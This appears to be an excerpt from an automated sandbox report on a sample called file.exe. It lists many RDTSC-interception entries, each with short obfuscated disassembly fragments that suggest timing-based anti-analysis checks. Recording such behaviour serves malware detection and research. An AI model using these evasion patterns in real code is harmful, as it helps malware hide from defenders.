                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2E8E3 second address: F2E8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC221A94B26h 0x0000000a jmp 00007FC221A94B2Eh 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F334B4 second address: F334B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F334B8 second address: F334BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F33639 second address: F33643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC220745DF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F33BDC second address: F33BE5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F33E44 second address: F33E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 je 00007FC220745DF6h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC220745E01h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F33FAB second address: F33FB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3422E second address: F34232 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F34232 second address: F34256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC221A94B39h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED94FE second address: ED9504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9504 second address: ED9508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC4E4 second address: EFC4E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC4E8 second address: EFC4F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC4F6 second address: EFC4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC4FA second address: EFC504 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC504 second address: EFC50E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC220745DFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC50E second address: ED8A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 jno 00007FC221A94B28h 0x0000000d call dword ptr [ebp+122D2688h] 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC5AC second address: EFC5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FC220745E0Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC5CF second address: EFC5D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFC5D4 second address: EFC5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCA2C second address: EFCA36 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCA36 second address: EFCA3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCA3A second address: D519BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push dword ptr [ebp+122D04E9h] 0x00000010 xor dx, 45BCh 0x00000015 mov ecx, dword ptr [ebp+122D2B4Ah] 0x0000001b call dword ptr [ebp+122D2819h] 0x00000021 pushad 0x00000022 jmp 00007FC221A94B37h 0x00000027 xor eax, eax 0x00000029 jmp 00007FC221A94B34h 0x0000002e mov edx, dword ptr [esp+28h] 0x00000032 stc 0x00000033 sub dword ptr [ebp+122D2F78h], edi 0x00000039 mov dword ptr [ebp+122D2B56h], eax 0x0000003f jmp 00007FC221A94B2Eh 0x00000044 mov esi, 0000003Ch 0x00000049 mov dword ptr [ebp+122D19E9h], edi 0x0000004f add esi, dword ptr [esp+24h] 0x00000053 jno 00007FC221A94B2Ch 0x00000059 lodsw 0x0000005b pushad 0x0000005c jnl 00007FC221A94B2Ch 0x00000062 mov ecx, dword ptr [ebp+122D2B16h] 0x00000068 popad 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d mov dword ptr [ebp+122D1B69h], edx 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 clc 0x00000078 nop 0x00000079 push eax 0x0000007a push edx 0x0000007b jnp 00007FC221A94B3Eh 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCB0B second address: EFCB27 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC220745DFCh 0x00000008 jne 00007FC220745DF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push ebx 0x00000013 pushad 0x00000014 jng 00007FC220745DF6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCB27 second address: EFCB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a jmp 00007FC221A94B2Bh 0x0000000f pop eax 0x00000010 and edx, dword ptr [ebp+122D2B7Ah] 0x00000016 push E680D4CBh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jns 00007FC221A94B26h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCC8A second address: EFCC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC220745DF6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFCC9A second address: EFCCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD50A second address: EFD51F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FC220745DF8h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD711 second address: EFD715 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD715 second address: EFD778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jnp 00007FC220745E03h 0x0000000e push edx 0x0000000f jmp 00007FC220745DFBh 0x00000014 pop edx 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FC220745DF8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov edx, 6CBB1FD8h 0x00000035 lea eax, dword ptr [ebp+1247E294h] 0x0000003b jng 00007FC220745E01h 0x00000041 js 00007FC220745DFBh 0x00000047 adc dx, 4B63h 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD778 second address: EFD77C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD77C second address: EFD7D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FC220745DFDh 0x0000000c pop esi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FC220745DF8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D1BE4h], ecx 0x00000031 lea eax, dword ptr [ebp+1247E250h] 0x00000037 add edx, dword ptr [ebp+122D251Ch] 0x0000003d nop 0x0000003e jo 00007FC220745DFEh 0x00000044 push esi 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD7D6 second address: ED94FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jnc 00007FC221A94B40h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FC221A94B28h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov di, B41Dh 0x0000002b call dword ptr [ebp+122D27F4h] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FC221A94B2Bh 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F38A15 second address: F38A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F38A19 second address: F38A56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B2Ch 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jnl 00007FC221A94B26h 0x00000013 jng 00007FC221A94B26h 0x00000019 popad 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007FC221A94B31h 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F38B99 second address: F38BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC220745DFDh 0x00000009 jne 00007FC220745E08h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F38D18 second address: F38D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3C552 second address: F3C558 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3C558 second address: F3C585 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC221A94B32h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FC221A94B26h 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007FC221A94B3Ch 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3C585 second address: F3C593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB62D1 second address: EB62D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E7A1 second address: F3E7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E7B1 second address: F3E7CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 jo 00007FC221A94B2Ch 0x0000000d jno 00007FC221A94B26h 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007FC221A94B26h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F41B55 second address: F41B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F41B59 second address: F41B78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B33h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F41B78 second address: F41B99 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FC220745E07h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F41B99 second address: F41BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B33h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F41363 second address: F4136D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC220745DF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4136D second address: F41373 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F41373 second address: F41394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E01h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FC220745DF6h 0x0000000f jp 00007FC220745DF6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F41394 second address: F4139A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4139A second address: F413E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC220745E06h 0x0000000f push edx 0x00000010 jmp 00007FC220745E00h 0x00000015 jmp 00007FC220745E05h 0x0000001a pop edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4157A second address: F41590 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FC221A94B26h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC221A94B2Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F416E0 second address: F416E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F45CAB second address: F45CD5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC221A94B40h 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FC221A94B26h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F45CD5 second address: F45D12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745DFFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FC220745E01h 0x00000013 jmp 00007FC220745E01h 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4592E second address: F45932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F45932 second address: F45936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F45936 second address: F45957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B37h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F45957 second address: F4595B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4595B second address: F459BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B32h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FC221A94B2Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 jnc 00007FC221A94B26h 0x00000019 jmp 00007FC221A94B2Ah 0x0000001e popad 0x0000001f jl 00007FC221A94B54h 0x00000025 jc 00007FC221A94B3Eh 0x0000002b jmp 00007FC221A94B36h 0x00000030 pushad 0x00000031 popad 0x00000032 pushad 0x00000033 jnc 00007FC221A94B26h 0x00000039 push ebx 0x0000003a pop ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4748F second address: F474B7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC220745DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC220745DFBh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC220745E01h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4B3C2 second address: F4B3C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C9CD second address: F4C9D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C9D3 second address: F4C9D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C9D9 second address: F4C9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50DAA second address: F50DD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B2Ah 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007FC221A94B30h 0x00000011 jmp 00007FC221A94B2Ah 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50DD1 second address: F50DE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745E04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5106B second address: F51075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC221A94B26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5130B second address: F5130F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5130F second address: F51319 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC221A94B26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51319 second address: F51329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FC220745DFEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51329 second address: F5132F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5132F second address: F51334 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD15A second address: EFD1CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC221A94B34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jne 00007FC221A94B26h 0x00000010 pop esi 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 adc cx, 5E73h 0x0000001a push 00000004h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007FC221A94B28h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 0000001Ah 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 mov di, B7B8h 0x0000003a mov edx, dword ptr [ebp+122D2B46h] 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 jns 00007FC221A94B3Bh 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F515DA second address: F515DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51F7F second address: F51F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51F84 second address: F51F9B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC220745E02h 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58D92 second address: F58DA0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC221A94B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58DA0 second address: F58DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58DA6 second address: F58DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58DAA second address: F58DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC220745DFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58DB8 second address: F58DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC221A94B30h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F593E6 second address: F593EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F593EA second address: F59414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC221A94B39h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FC221A94B26h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59414 second address: F59439 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007FC220745DF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FC220745E09h 0x00000011 rdtsc
